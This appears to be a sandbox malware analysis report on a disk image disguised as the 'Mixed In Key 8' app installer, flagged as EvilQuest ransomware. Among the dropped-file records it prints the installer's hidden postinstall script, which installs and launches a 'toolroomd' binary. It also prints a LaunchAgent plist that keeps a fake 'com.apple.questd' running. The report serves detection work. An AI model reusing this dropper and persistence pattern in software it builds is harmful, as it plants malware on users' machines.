                                                                                                    SHA-512:493001B1D8C9218AD39E10C5BFB6772B330A13E7EE651C48AB3BC6BA66F69A7D3C5592FA27E9B77326DA557DB6CB19A09683795F1718DDABD17D7DBB0CFF29B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........... GDEF.B....1....bGPOS......4...].GSUB...Y........OS/2...R.......`cmap.wX....X...Fcvt ..-...0....Rfpgms.....-.....gasp......1.....glyf...I..;....$hdmx:[La...@....head...e...,...6hhea.......d...$hmtx3d.........8loca|..Q..0.....maxp.>......... name...K..-8...Gpost.a.d..1.... prep..].../\...D......#.6..._.<...................R..8...L.s.................l.......8.l.L.............................V.......................o.........3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................C.......R.f.J.......:.d.....m.....b.k.p.L...........5.=...f.h.f...f...f.4.f...f.r.f.p.f...f.A.f.....+.......A.L.p...:.......D.......;...t.!.;.s.;.T.;.S.y...;.&.I.R.....;.7.;...;...;.`.w...;.`.o...:...'.......g.........................9.....z.H.O.....p...C.3.e.....F.j.K.&.E...t.e...P...../....... .../.....R...w.E.e...s.I...........C.Q.[...n...................8...!.....Q.i.....H.R...........C.........H...#.b.......Y.V...$.a........./.%...\...n.y...o.....{
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/_CodeSignature/.BC.T_3yGq3E
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):53912
                                                                                                    Entropy (8bit):5.457896281200372
                                                                                                    Encrypted:false
                                                                                                    MD5:1C71068F7612F3DC2D0F25C29C381C18
                                                                                                    SHA1:50AABDCB7BC20964410F9C2337B3237921C7A770
                                                                                                    SHA-256:5DE4F95DD561054C8F6E78748F6A550CC973B80534C827F368E8BC4BAEF9C16A
                                                                                                    SHA-512:5EE75A7D981EEC612567466D08D788B3623240CAA15DC547C111ECD388D5EA15419BF9AB1EAA1818ABB9F1785D29C2110D521FADF20A716D84AC274D8306C8AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Ableton_Icon.tiff</key>...<data>...zrnfOHe3nwYxiPGddHrODBSxZ9g=...</data>...<key>Resources/ArtworkPopoverView.nib</key>...<data>...tiW9tb+dS0r6nese682QJ8cVQLw=...</data>...<key>Resources/Beyond_Beatmatching_transparent.png</key>...<data>...6Ey3O0QI2+eNqXY2JIYV+WDgy48=...</data>...<key>Resources/DataSongEditor.nib</key>...<data>...qFRLadNqmXXqoO2FnsALZhpMR9I=...</data>...<key>Resources/English.lproj/AddFilesWindow.nib</key>...<dict>....<key>hash</key>....<data>....J4soXJf/V7HN81b8uhOX1mrKIgA=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/English.lproj/BetaFeedbackView.nib</key>...<dict>....<key>hash</key>....<data>....p3WqhD2oAIwOy3MrXWnx340wX1w=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/English.lproj/DragDialog.nib</key>
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Utils/.BC.T_5f8PkX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):87920
                                                                                                    Entropy (8bit):5.9040129231424165
                                                                                                    Encrypted:false
                                                                                                    MD5:322F4FB8F257A2E651B128C41DF92B1D
                                                                                                    SHA1:EFBB681A61967E6F5A811F8649EC26EFE16F50AE
                                                                                                    SHA-256:5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
                                                                                                    SHA-512:33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Utils/.BC.T_5f8PkX, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/.BC.T_BM52wb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:POSIX shell script text executable
                                                                                                    Size (bytes):190
                                                                                                    Entropy (8bit):4.485363044359685
                                                                                                    Encrypted:false
                                                                                                    MD5:03FC4E3EF9BDBCCD7EA68537970CE472
                                                                                                    SHA1:7CC289BADFE38C5677175FA38810E0E18C51E1D3
                                                                                                    SHA-256:ABCCE423690C96A06414F68090DB40CBDAEE12B67F90D1CA64BDDBDC1D11D097
                                                                                                    SHA-512:6F089D9C977FABC18E0A599C8239200031B6EEED1FBBD2F8197BB82E7CDD8F695B220902BEF49276C6B1CA8784EBC3503ABA841146A4CE36B1B571703E832BF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: #!/bin/sh.mkdir /Library/mixednkey..mv /Applications/Utils/patch /Library/mixednkey/toolroomd.rmdir /Application/Utils..chmod +x /Library/mixednkey/toolroomd../Library/mixednkey/toolroomd &.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/.BC.T_q7lZI7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:AppleDouble encoded Macintosh file
                                                                                                    Size (bytes):82
                                                                                                    Entropy (8bit):1.957754205215279
                                                                                                    Encrypted:false
                                                                                                    MD5:5F57248F8A15969F55F716D8E7CE1447
                                                                                                    SHA1:2DAF28E0B224464534EECC6576C5B87E05CAD4A7
                                                                                                    SHA-256:03EE1B034D79AF0D5BC807F1560E7FFD5554FF56FCF29A47B3AC5DB4F7FA4EB5
                                                                                                    SHA-512:2D9A3E97A5B991D9D22EF5E008F1828B9A7F8B8AA35111250EDF45F9ED3F772378119F2A8C18CF5D1141F34D0B04200EADC7B75F1AAA57E0C15083C28F73C5C7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........Mac OS X .........2... .......R....................................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Scripts/.BC.T_Pf7TBJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:AppleDouble encoded Macintosh file
                                                                                                    Size (bytes):82
                                                                                                    Entropy (8bit):1.957754205215279
                                                                                                    Encrypted:false
                                                                                                    MD5:5F57248F8A15969F55F716D8E7CE1447
                                                                                                    SHA1:2DAF28E0B224464534EECC6576C5B87E05CAD4A7
                                                                                                    SHA-256:03EE1B034D79AF0D5BC807F1560E7FFD5554FF56FCF29A47B3AC5DB4F7FA4EB5
                                                                                                    SHA-512:2D9A3E97A5B991D9D22EF5E008F1828B9A7F8B8AA35111250EDF45F9ED3F772378119F2A8C18CF5D1141F34D0B04200EADC7B75F1AAA57E0C15083C28F73C5C7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........Mac OS X .........2... .......R....................................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Scripts/.BC.T_PhXClD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:POSIX shell script text executable
                                                                                                    Size (bytes):190
                                                                                                    Entropy (8bit):4.485363044359685
                                                                                                    Encrypted:false
                                                                                                    MD5:03FC4E3EF9BDBCCD7EA68537970CE472
                                                                                                    SHA1:7CC289BADFE38C5677175FA38810E0E18C51E1D3
                                                                                                    SHA-256:ABCCE423690C96A06414F68090DB40CBDAEE12B67F90D1CA64BDDBDC1D11D097
                                                                                                    SHA-512:6F089D9C977FABC18E0A599C8239200031B6EEED1FBBD2F8197BB82E7CDD8F695B220902BEF49276C6B1CA8784EBC3503ABA841146A4CE36B1B571703E832BF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: #!/bin/sh.mkdir /Library/mixednkey..mv /Applications/Utils/patch /Library/mixednkey/toolroomd.rmdir /Application/Utils..chmod +x /Library/mixednkey/toolroomd../Library/mixednkey/toolroomd &.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Utils/.BC.T_qXDTh4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):87920
                                                                                                    Entropy (8bit):5.9040129231424165
                                                                                                    Encrypted:false
                                                                                                    MD5:322F4FB8F257A2E651B128C41DF92B1D
                                                                                                    SHA1:EFBB681A61967E6F5A811F8649EC26EFE16F50AE
                                                                                                    SHA-256:5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
                                                                                                    SHA-512:33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A/Utils/.BC.T_qXDTh4, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.sandbox/.dat.nosync02df.uhpiJs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):36
                                                                                                    Entropy (8bit):3.673416585305445
                                                                                                    Encrypted:false
                                                                                                    MD5:572746D4407AA63F8813740A8BAEA150
                                                                                                    SHA1:495C6464BA57B97E3EF03936F2B71F209B5BFB3A
                                                                                                    SHA-256:EC6050ADD57A25395807D62581FD740E93A417051FEF04C8C5FBD910CAF4E941
                                                                                                    SHA-512:9A3673F726F309C0F23A40EB7CDD8B8766463A928B44E5C7381FB94E94A26293F6189910E88A35F3A874C5BCC3EFC0A08CF3934441FD7064039734A96C2E8F17
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 525A7FCA-7CC1-4A14-A008-A00459D8E486
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/com.apple.osascript/com.apple.metal/3902/libraries.maps
                                                                                                    Process:/usr/bin/osascript
                                                                                                    File Type:data
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):1.9214437012598877
                                                                                                    Encrypted:false
                                                                                                    MD5:4AFA50F9719F26BFDA00878401DC7F63
                                                                                                    SHA1:BF2EC76250B751D2B8E2CC426D1295105D9E9539
                                                                                                    SHA-256:F74E75834307049C4778A55321B7FC481CAFA1F937FCA90996937757628C3144
                                                                                                    SHA-512:F62BBC3A80625F103752E41B041B206196515A282BA1C18F636BBF957460740E018F1628662D3F95E548521038854711C8D1670E0CEC299AD62EFA4B55FB1EB2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ................X.......X.......................................................................................................................................................................................X................................................................................................................................................................................................................................................................................................................................................n.'0..Q...b..>.....d.B.8.....7.........E6'.........................................KAT..../a|.]...#w.....XZr{i.. ................k.....................................................................................................................................................................................................................................................................................................................................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/com.apple.osascript/com.apple.metal/Intel Iris Graphics/functions.maps
                                                                                                    Process:/usr/bin/osascript
                                                                                                    File Type:data
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):1.9073698995800932
                                                                                                    Encrypted:false
                                                                                                    MD5:EA1210D0ADC92F21F1DD4AEE104AA1A8
                                                                                                    SHA1:371F4BB4D77AADDC240DB3DF32DE6E6331D91EB0
                                                                                                    SHA-256:E41CFB22F4FA27CFC0F57F55E122A36A32279DBA5B1F45622E2277D5E85CE30D
                                                                                                    SHA-512:FDFAE1DDB8B6806BF9ACBA55E64696BA9EC5512B3365ECE4B8EB595E5C916E494D600BEC67803079CD985B8FE293E3E5AAF9E68EDFAFC95FD068D556EB91100C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ................X.......X...............................................................................................................................................................................................................................X.......................................................................................................................................................................................................................................................................................................}.h.TB6B...y...`m.3.........u...........E6'.....................................[(.n.y#..|......>h..{...ib...bR><................0P.....................................................................................................................................................................................................................................................................................................................................
                                                                                                    /private/var/root/.ncspot
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):43
                                                                                                    Entropy (8bit):4.543144558166351
                                                                                                    Encrypted:false
                                                                                                    MD5:E7B1BCC844593F62CAE4A7C6B3F56ECA
                                                                                                    SHA1:E6E4599168CD5692F9F85C1FE477F0938CA307C2
                                                                                                    SHA-256:891219A21ADB5AC3988670ADA98532B024BECA26B7D0CE3BCCC826DA4355643D
                                                                                                    SHA-512:7EBA9733533E40E345172583A4CA765806865B4A7E5B081DF3616CBE276524D9A06A2FDA0923EBF6DD58FD4B7D0EEB8A56BAC66D3163903E37411BF566EFB845
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 29flm32Uq3Ml1nK8vF2yRSsy3zEFYP1Nz|3x0000043
                                                                                                    /private/var/root/Library/.FNm8T2eKL
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):87920
                                                                                                    Entropy (8bit):5.9040129231424165
                                                                                                    Encrypted:false
                                                                                                    MD5:322F4FB8F257A2E651B128C41DF92B1D
                                                                                                    SHA1:EFBB681A61967E6F5A811F8649EC26EFE16F50AE
                                                                                                    SHA-256:5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
                                                                                                    SHA-512:33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/root/Library/.FNm8T2eKL, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /private/var/root/Library/AppQuest/com.apple.questd
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):87920
                                                                                                    Entropy (8bit):5.9040129231424165
                                                                                                    Encrypted:false
                                                                                                    MD5:322F4FB8F257A2E651B128C41DF92B1D
                                                                                                    SHA1:EFBB681A61967E6F5A811F8649EC26EFE16F50AE
                                                                                                    SHA-256:5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
                                                                                                    SHA-512:33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........
                                                                                                    /private/var/root/Library/LaunchAgents/com.apple.questd.plist
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):422
                                                                                                    Entropy (8bit):5.149933061512801
                                                                                                    Encrypted:false
                                                                                                    MD5:70C1E05FF6B32DB6E1EF873321ABD1F9
                                                                                                    SHA1:16878E40CD5A569BC8F441988CC07B66FFC8534A
                                                                                                    SHA-256:BA60FEB2A639CD847674E6599CABF986EDE7876231A292785B0365D58B7B9378
                                                                                                    SHA-512:1E82629B3B1FA7BB88E7EFE0393AEE7114631555FBFE614D33B9B1EFB4D299C35DAC5E393F834DCC26A5E192E46E317124C0B841F65AB371819C34802424712E
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>/var/root/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>
                                                                                                    /private/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
                                                                                                    Process:/usr/bin/osascript
                                                                                                    File Type:data
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):7.253166192634359
                                                                                                    Encrypted:false
                                                                                                    MD5:15863BEF33185681FC3CAC5AE605541C
                                                                                                    SHA1:452408D8367E2822D5507671EE4869E4D7A7433A
                                                                                                    SHA-256:493333EC69EA7911281982B4F0BCAF39D4EC4363B8F20BE311F0D0B7336B2BEC
                                                                                                    SHA-512:7183A33F1F9F0BFAFB3A919655120D5BCCFF52626F69EEAE0F68F60EFA2502EB573E6B137192468FDF1088EB72F7AD4E2275891C7ADFBA180901020BB08334CA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: NSCR1000....... j..ScU2..h.....-....... ).Q.&.=8.c..........6q...?...$1..1.?4X......-y.c....LV..........4.y..T.....2.....@./..[.... X.A].f..T.-zB......].m.s..........J.../.qF1...f......+...o.q.sx.oA....x.id....2...Gu..!.M....qI.....<nf..G1.V...]_<...}|....%..l|..ul.....r..YkY+'..,"..Wn.7
                                                                                                    /private/var/root/Library/Saved Application State/com.apple.osascript.savedState/windows.plist
                                                                                                    Process:/usr/bin/osascript
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):5.850685857811276
                                                                                                    Encrypted:false
                                                                                                    MD5:6545714AA977A0B76BB0864ACBFB2255
                                                                                                    SHA1:C3F2E7B024DC6A27F36B9F68EE133ADAFB89D868
                                                                                                    SHA-256:56D5247B2A87DA62A5ACEF5EA0CF2886913CDC77DB1D03A9D125C34DC20D547E
                                                                                                    SHA-512:B3EB2F97C18765590F65472C72074F44F19638019613F9093D90E7E4F38FB907BA48A58223D24E8C3CFA1AFA8FB87AD2A662879FED433A83FD9ED82FCE65E856
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................^NSWindowZOrderYNSDataKeyZNSIsGlobal_..NSSystemVersion_..NSSystemAppearance_..NSExecutableInodeZNSWindowID...ZO.......`D..~.=...............O...bplist00.........X$versionX$objectsY$archiverT$top..........U$null.....V$class_..NSAppearanceName...._..NSAppearanceNameDarkAqua.....Z$classnameX$classes\NSAppearance...XNSObject_..NSKeyedArchiver...Troot.....#-27<BGNace...............................................................(.2.=.O.d.x......................................................
                                                                                                    /private/var/run/.dat.nosync02df.49ThaA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):3
                                                                                                    Entropy (8bit):1.584962500721156
                                                                                                    Encrypted:false
                                                                                                    MD5:6CD67D9B6F0150C77BDA2EDA01AE484C
                                                                                                    SHA1:A6B21A4281226E8A97C2E05517FBE546775EFC6A
                                                                                                    SHA-256:1A42D5267ABA37D7057CADD672FEFEF04771BE2476EEEE231D6F56A8E1F57733
                                                                                                    SHA-512:3CC356D94321A7C258585AB1CB55D5316B3CC309C8B80E9CFD67AE2B55AA6C408F456730426BF40661ED4851B475A3F0C4E84449457A076BF5D144F12E8B48FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 735

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:VAX COFF executable not stripped
                                                                                                    Entropy (8bit):7.997598927891824
                                                                                                    TrID:
                                                                                                    • Disk Image (Macintosh), zlib, GPT (10001/1) 90.90%
                                                                                                    • XMill compressed XML (1001/1) 9.10%
                                                                                                    File name:Nt7gLoFlYn.dmg
                                                                                                    File size:10880309
                                                                                                    MD5:58680abd58baca826c2029f32e5b78b3
                                                                                                    SHA1:98040c4d358a6fb9fed970df283a9b25f0ab393b
                                                                                                    SHA256:b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a
                                                                                                    SHA512:be852ea2a0ce7a119392f6f28033dfcec27ac897f3479767287da8e5b2babd2cff95b94c399e64d5f219fbef3508a3a2f2b2f4346e057ddce416353825994d28
                                                                                                    SSDEEP:196608:1kBu2wBiw00Bsqbxxf15AS2710A8O2RgXuHueFrs/7M+49/jhHh/:ig2whsQr5ASEcO28enS/7J4tT/
                                                                                                    File Content Preview:x.su.T.p..a``d.a``..uz...<.X..B+A.]P.-{.S.?X<.F.Sa.<....o.. |..{> 5..y......Lx.c`..C8.........^X..t......).:x...!..........h4.,.....L...b.....^A.O.9..&....<..e...w.t.I].E:..v.....x>....W.X.....y.Xd.M..>..,........... @....... @....... @....... @....... @.

                                                                                                    Archive DMG

                                                                                                    Archived Files

                                                                                                    File PathFile AttributesFile Size
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Headers24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/License.nib18231
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand.h11025
                                                                                                    Mixed In Key 8.app/Contents/Resources/Serato_Icon.tiff11030
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel.mom6672
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tmap.h6273
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/info@2x.png2160
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/magnify@2x.png622
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nib18605
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/ContentsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nib18463
                                                                                                    Mixed In Key 8.app/Contents/MacOS/Mixed In Key 81979920
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/SlideUpPanel.nib9351
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/warning.rtf964
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizerInstrument.h2278
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.strings4422
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCopyrightEvent.h761
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/ModulesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/CodeResources8382
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mfile.h4158
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-BlackItalic.ttf177552
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIErrors.h2669
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Regular.ttf171676
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nib12166
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/module.modulemap95
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureEvent.h1163
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.strings4122
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unicode.h6142
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfilebase.h2701
